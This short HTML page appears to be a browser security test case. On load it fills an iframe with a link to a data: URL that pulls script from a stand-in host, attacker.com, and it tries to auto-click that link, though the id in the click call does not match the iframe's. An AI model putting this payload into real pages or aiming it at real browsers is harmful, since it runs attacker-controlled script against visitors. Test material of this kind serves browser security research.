<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGKoTZeGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGKoTZeGGGGG.addEventListener("load",()=>{GGGGGKoTZeGGGGG.srcdoc="<a id=a1 href='data:text/html,<script src=https://attacker.com/static/static.js><\\/script>'>click<\/a><script>GGGGKoTZeGGGG.click();<\/script>";},{once:true});
};
</script>
</body>
</html>